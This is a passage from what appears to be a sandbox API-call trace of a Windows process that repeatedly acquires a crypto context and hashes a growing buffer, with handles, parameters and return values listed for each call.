(hProv=0x304f30, dwFlags=0x0) returned 1 [0230.933] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.933] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.933] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x300, dwFlags=0x0) returned 1 [0230.933] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.933] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x321110, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x321110, pdwDataLen=0x12e8b8) returned 1 [0230.933] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.933] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.933] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.934] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.934] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x320, dwFlags=0x0) returned 1 [0230.934] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.934] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x321140, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x321140, pdwDataLen=0x12e8b8) returned 1 [0230.934] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.934] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.934] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.934] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.934] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x340, dwFlags=0x0) returned 1 [0230.934] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.935] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x321170, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x321170, pdwDataLen=0x12e8b8) returned 1 [0230.935] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.935] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.935] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.935] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.935] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x360, dwFlags=0x0) returned 1 [0230.935] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.935] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x3211a0, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x3211a0, pdwDataLen=0x12e8b8) returned 1 [0230.935] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.935] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.935] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.935] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.935] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x380, dwFlags=0x0) returned 1 [0230.936] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.936] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x3211d0, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x3211d0, pdwDataLen=0x12e8b8) returned 1 [0230.936] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.936] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.936] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.936] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.936] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x3a0, dwFlags=0x0) returned 1 [0230.936] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.936] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x321200, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x321200, pdwDataLen=0x12e8b8) returned 1 [0230.936] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.936] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.936] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.937] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.937] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x3c0, dwFlags=0x0) returned 1 [0230.937] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.937] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x321230, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x321230, pdwDataLen=0x12e8b8) returned 1 [0230.937] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.937] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.937] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.937] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.937] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x3e0, dwFlags=0x0) returned 1 [0230.937] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.937] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x321260, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x321260, pdwDataLen=0x12e8b8) returned 1 [0230.937] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.937] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.937] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.938] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.938] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x400, dwFlags=0x0) returned 1 [0230.938] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.938] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x321290, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x321290, pdwDataLen=0x12e8b8) returned 1 [0230.938] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.938] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.938] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.938] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.938] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x420, dwFlags=0x0) returned 1 [0230.938] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.938] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x3212c0, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x3212c0, pdwDataLen=0x12e8b8) returned 1 [0230.938] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.938] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.938] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.939] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.939] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x440, dwFlags=0x0) returned 1 [0230.939] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.939] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x3212f0, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x3212f0, pdwDataLen=0x12e8b8) returned 1 [0230.939] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.939] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.939] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.939] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.939] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x460, dwFlags=0x0) returned 1 [0230.939] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.939] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x321320, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x321320, pdwDataLen=0x12e8b8) returned 1 [0230.939] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.939] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.939] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.940] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.940] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x480, dwFlags=0x0) returned 1 [0230.940] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.940] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x321350, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x321350, pdwDataLen=0x12e8b8) returned 1 [0230.940] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.940] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.940] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.940] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.940] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x4a0, dwFlags=0x0) returned 1 [0230.940] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.940] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x321380, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x321380, pdwDataLen=0x12e8b8) returned 1 [0230.940] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.940] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.940] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.941] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.941] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x4c0, dwFlags=0x0) returned 1 [0230.941] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.941] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x3213b0, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x3213b0, pdwDataLen=0x12e8b8) returned 1 [0230.941] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.941] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.941] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.941] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.941] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x4e0, dwFlags=0x0) returned 1 [0230.941] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.941] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x3213e0, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x3213e0, pdwDataLen=0x12e8b8) returned 1 [0230.941] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.941] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.942] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.942] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.942] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x500, dwFlags=0x0) returned 1 [0230.942] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.942] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x320c90, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x320c90, pdwDataLen=0x12e8b8) returned 1 [0230.942] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.942] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.942] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.942] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.943] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x520, dwFlags=0x0) returned 1 [0230.943] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.943] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x321460, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x321460, pdwDataLen=0x12e8b8) returned 1 [0230.943] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.943] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.943] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.943] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.943] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x540, dwFlags=0x0) returned 1 [0230.943] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.943] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x3214c0, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x3214c0, pdwDataLen=0x12e8b8) returned 1 [0230.943] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.943] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.943] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.944] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.944] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x560, dwFlags=0x0) returned 1 [0230.944] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.944] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x3214f0, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x3214f0, pdwDataLen=0x12e8b8) returned 1 [0230.944] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.944] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.944] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.944] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.944] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x580, dwFlags=0x0) returned 1 [0230.944] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.944] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x321520, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x321520, pdwDataLen=0x12e8b8) returned 1 [0230.944] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.944] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.944] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.945] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.945] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x5a0, dwFlags=0x0) returned 1 [0230.945] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.945] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x321550, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x321550, pdwDataLen=0x12e8b8) returned 1 [0230.945] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.945] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.945] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.945] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.945] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x5c0, dwFlags=0x0) returned 1 [0230.945] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.945] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x321580, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x321580, pdwDataLen=0x12e8b8) returned 1 [0230.945] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.945] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.945] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.946] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.946] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x5e0, dwFlags=0x0) returned 1 [0230.946] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.946] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x3215b0, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x3215b0, pdwDataLen=0x12e8b8) returned 1 [0230.946] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.946] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.946] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.946] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.946] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x600, dwFlags=0x0) returned 1 [0230.946] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.946] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x3215e0, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x3215e0, pdwDataLen=0x12e8b8) returned 1 [0230.946] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.946] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.946] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.947] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.947] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x620, dwFlags=0x0) returned 1 [0230.947] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.947] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x321610, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x321610, pdwDataLen=0x12e8b8) returned 1 [0230.947] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.947] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.947] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.947] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.947] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x640, dwFlags=0x0) returned 1 [0230.947] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.947] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x321640, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x321640, pdwDataLen=0x12e8b8) returned 1 [0230.947] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.947] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.947] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.948] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.948] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x660, dwFlags=0x0) returned 1 [0230.948] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.948] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x321670, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x321670, pdwDataLen=0x12e8b8) returned 1 [0230.948] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.948] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.948] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.948] CryptCreateHash (in: hProv=0x304f30, 